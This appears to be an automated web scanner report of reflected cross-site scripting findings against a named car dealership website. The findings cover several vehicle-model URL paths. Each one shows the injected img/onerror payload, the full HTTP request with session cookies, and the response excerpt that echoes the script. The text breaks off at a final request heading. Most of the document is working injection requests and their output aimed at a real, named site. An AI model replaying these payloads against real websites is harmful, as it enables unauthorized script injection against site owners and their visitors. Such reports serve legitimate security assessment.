The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cb8a3'><img%20src%3da%20onerror%3dalert(1)>ce0eb99e77f was submitted in the REST URL parameter 2. This input was echoed as cb8a3'><img src=a onerror=alert(1)>ce0eb99e77f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/FJ%20Cruiser%204x2cb8a3'><img%20src%3da%20onerror%3dalert(1)>ce0eb99e77f/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:41:27 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:41:27 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:41:28 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota FJ Cruiser 4 ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=FJ Cruiser 4x2cb8a3'><img src=a onerror=alert(1)>ce0eb99e77f'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e8b1e<img%20src%3da%20onerror%3dalert(1)>927cffad9bf was submitted in the REST URL parameter 2. This input was echoed as e8b1e<img src=a onerror=alert(1)>927cffad9bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/FJ%20Cruiser%204x2e8b1e<img%20src%3da%20onerror%3dalert(1)>927cffad9bf/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:43:12 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:43:12 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:43:13 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16328
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota FJ Cruiser 4 ...[SNIP]... <H1> Toyota FJ Cruiser 4x2e8b1e<img src=a onerror=alert(1)>927cffad9bf</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4bf6"><img%20src%3da%20onerror%3dalert(1)>b48455da56c was submitted in the REST URL parameter 2. This input was echoed as a4bf6"><img src=a onerror=alert(1)>b48455da56c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/FJ%20Cruiser%204x4a4bf6"><img%20src%3da%20onerror%3dalert(1)>b48455da56c/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:32:22 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:32:23 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:32:23 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16376
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota FJ Cruiser 4 ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota FJ Cruiser 4x4a4bf6"><img src=a onerror=alert(1)>b48455da56c at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota FJ Cruiser 4x4a4bf6"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee26c<img%20src%3da%20onerror%3dalert(1)>9c3f8e76fb0 was submitted in the REST URL parameter 2. This input was echoed as ee26c<img src=a onerror=alert(1)>9c3f8e76fb0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/FJ%20Cruiser%204x4ee26c<img%20src%3da%20onerror%3dalert(1)>9c3f8e76fb0/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:39:17 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:39:18 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:39:18 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota FJ Cruiser 4 ...[SNIP]... <H1> Toyota FJ Cruiser 4x4ee26c<img src=a onerror=alert(1)>9c3f8e76fb0</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a8122'><img%20src%3da%20onerror%3dalert(1)>37ae5490606 was submitted in the REST URL parameter 2. This input was echoed as a8122'><img src=a onerror=alert(1)>37ae5490606 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/FJ%20Cruiser%204x4a8122'><img%20src%3da%20onerror%3dalert(1)>37ae5490606/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:35:48 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:35:49 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:35:49 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16394
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota FJ Cruiser 4 ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=FJ Cruiser 4x4a8122'><img src=a onerror=alert(1)>37ae5490606'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db221'><img%20src%3da%20onerror%3dalert(1)>7291df1950f was submitted in the REST URL parameter 2. This input was echoed as db221'><img src=a onerror=alert(1)>7291df1950f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Highlander%20Hybriddb221'><img%20src%3da%20onerror%3dalert(1)>7291df1950f/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:24:20 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:24:21 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:24:21 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16455
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Highlander H ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Highlander Hybriddb221'><img src=a onerror=alert(1)>7291df1950f'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 952cc"><img%20src%3da%20onerror%3dalert(1)>086a534c3d5 was submitted in the REST URL parameter 2. This input was echoed as 952cc"><img src=a onerror=alert(1)>086a534c3d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Highlander%20Hybrid952cc"><img%20src%3da%20onerror%3dalert(1)>086a534c3d5/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:22:02 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:22:03 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:22:03 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16455
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Highlander H ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Highlander Hybrid952cc"><img src=a onerror=alert(1)>086a534c3d5 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Highlander Hybrid952cc"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c236<img%20src%3da%20onerror%3dalert(1)>912be62f461 was submitted in the REST URL parameter 2. This input was echoed as 2c236<img src=a onerror=alert(1)>912be62f461 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Highlander%20Hybrid2c236<img%20src%3da%20onerror%3dalert(1)>912be62f461/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:26:18 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:26:19 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:26:19 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16401
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Highlander H ...[SNIP]... <H1> Toyota Highlander Hybrid2c236<img src=a onerror=alert(1)>912be62f461</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0a4a"><img%20src%3da%20onerror%3dalert(1)>cc3d7bd15fb was submitted in the REST URL parameter 2. This input was echoed as f0a4a"><img src=a onerror=alert(1)>cc3d7bd15fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Highlanderf0a4a"><img%20src%3da%20onerror%3dalert(1)>cc3d7bd15fb/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:40:46 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:40:46 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:40:47 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16275
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Highlanderf0 ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Highlanderf0a4a"><img src=a onerror=alert(1)>cc3d7bd15fb at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Highlanderf0a4a"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 80588'><img%20src%3da%20onerror%3dalert(1)>72af12dc3a9 was submitted in the REST URL parameter 2. This input was echoed as 80588'><img src=a onerror=alert(1)>72af12dc3a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Highlander80588'><img%20src%3da%20onerror%3dalert(1)>72af12dc3a9/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:42:47 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:42:47 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:42:48 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16318
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Highlander80 ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Highlander80588'><img src=a onerror=alert(1)>72af12dc3a9'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload abc56<img%20src%3da%20onerror%3dalert(1)>f87937a406 was submitted in the REST URL parameter 2. This input was echoed as abc56<img src=a onerror=alert(1)>f87937a406 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Highlanderabc56<img%20src%3da%20onerror%3dalert(1)>f87937a406/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:45:52 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:45:53 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:45:53 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16234
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Highlanderab ...[SNIP]... <H1> Toyota Highlanderabc56<img src=a onerror=alert(1)>f87937a406</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17732"><img%20src%3da%20onerror%3dalert(1)>f539c63831e was submitted in the REST URL parameter 2. This input was echoed as 17732"><img src=a onerror=alert(1)>f539c63831e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Land%20Cruiser17732"><img%20src%3da%20onerror%3dalert(1)>f539c63831e/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:21:51 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:21:51 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:21:52 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16361
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Land Cruiser ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Land Cruiser17732"><img src=a onerror=alert(1)>f539c63831e at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Land Cruiser17732"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4dd3d<img%20src%3da%20onerror%3dalert(1)>a7836b6dd12 was submitted in the REST URL parameter 2. This input was echoed as 4dd3d<img src=a onerror=alert(1)>a7836b6dd12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Land%20Cruiser4dd3d<img%20src%3da%20onerror%3dalert(1)>a7836b6dd12/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:25:57 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:25:57 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:25:58 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16286
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Land Cruiser ...[SNIP]... <H1> Toyota Land Cruiser4dd3d<img src=a onerror=alert(1)>a7836b6dd12</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f9222'><img%20src%3da%20onerror%3dalert(1)>3782e174f71 was submitted in the REST URL parameter 2. This input was echoed as f9222'><img src=a onerror=alert(1)>3782e174f71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Land%20Cruiserf9222'><img%20src%3da%20onerror%3dalert(1)>3782e174f71/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:23:55 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:23:55 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:23:56 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Land Cruiser ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Land Cruiserf9222'><img src=a onerror=alert(1)>3782e174f71'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5f8d3<img%20src%3da%20onerror%3dalert(1)>4e65e083804 was submitted in the REST URL parameter 2. This input was echoed as 5f8d3<img src=a onerror=alert(1)>4e65e083804 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
